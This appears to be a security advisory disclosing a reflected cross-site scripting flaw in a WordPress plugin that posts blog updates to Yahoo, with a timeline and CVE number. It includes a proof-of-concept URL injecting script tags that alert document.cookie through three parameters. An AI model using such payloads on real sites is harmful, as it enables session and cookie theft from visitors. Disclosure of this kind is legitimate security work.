wp-plugin : yahoo-updates-for-wordpress – A3-Cross-Site Scripting (XSS)

 

Plugin Details

 

Plugin Name : yahoo-updates-for-wordpress

 

Effected Version : 1.0 (and most probably lower version's if any)

 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Anant Shrivastava

 

 

Technical Details

 

Minimum Level of Access Required : Unauthenticated

 

PoC - (Proof of Concept) :

 

<a href="http://localhost/wp-content/plugins/yahoo-updates-for-wordpress/yupdates_application.php?secret=alert(document.cookie)&key=keyalert(document.cookie)&appid=alert(document.cookie)&”>http://localhost/wp-content/plugins/yahoo-updates-for-wordpress/yupdates_application.php?secret=</script><script>alert(document.cookie)</script>&key=key</script><script>alert(document.cookie)</script>&appid=</script><script>alert(document.cookie)</script>&

 

Here the parameter ‘secret, key, appid’ is susceptible.

 

Disclosure Timeline

 

Vendor Contacted : 2014-01-17

 
Plugin Status : Closed
 
Public Disclosure : May 28, 2014
 
CVE Number : CVE-2014-4603

 
Plugin Description :
 
This plugin connects your WordPress blog to your Yahoo! account and creates an update sent to your connections whenever you publish a new blog post. This update contains a title, link and short excerpt of your new post for your connections to click and follow the link back to your blog.

Read more about the [Yahoo! Updates](http://developer.yahoo.com/social/updates/) platform.

Interested in contributing to this plugin? Fork the source on [GitHub](https://github.com/yahoo/yupdates-wordpress/).

The Yahoo! Updates WordPress Plugin code is subject to the BSD license, see the LICENSE file.

Leave a Reply

Your email address will not be published. Required fields are marked *